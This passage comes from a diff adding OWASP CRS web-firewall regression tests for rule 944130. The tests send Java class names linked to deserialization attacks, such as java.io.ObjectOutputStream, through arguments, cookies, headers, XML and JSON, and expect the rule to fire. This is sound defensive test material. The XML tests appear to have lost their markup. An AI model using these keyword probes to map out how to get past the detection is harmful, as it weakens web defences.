version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-162 + desc: "Nested XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-163 + desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-164 + desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-165 + desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-166 + desc: "Argument test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-167 + desc: "Argument name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-168 + desc: "Cookie test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-169 + desc: "Cookie name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-170 + desc: "Request header test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-171 + desc: "XML attribute value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - 
test_title: 944130-172 + desc: "XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-173 + desc: "Nested XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-174 + desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-175 + desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-176 + desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-177 + desc: "Argument test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-178 + desc: "Argument name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: 
"POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-179 + desc: "Cookie test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-180 + desc: "Cookie name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-181 + desc: "Request header test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-182 + desc: "XML attribute value includes 
keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-183 + desc: "XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-184 + desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-185 + desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-186 + desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-187 + desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-188 + desc: "Argument test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id 
\"944130\"" + - test_title: 944130-189 + desc: "Argument name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-190 + desc: "Cookie test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-191 + desc: "Cookie name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-192 + desc: "Request header test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-193 + desc: "XML attribute value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-194 + desc: "XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-195 + desc: "Nested XML element value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream" + 
output: + log_contains: "id \"944130\"" + - test_title: 944130-196 + desc: "Content-Type text/plain includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-197 + desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-198 + desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-199 + desc: "Argument test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-200 + desc: "Argument name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-201 + desc: "Cookie test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-202 + desc: "Cookie name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-203 + desc: "Request header test includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-204 + desc: "XML attribute value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-205 + desc: "XML element value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-206 + desc: "Nested XML element value includes keyword 
java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-207 + desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-208 + desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-209 + desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-210 + desc: "Argument test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-211 + desc: "Argument name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-212 + desc: "Cookie test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + 
version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-213 + desc: "Cookie name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-214 + desc: "Request header test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 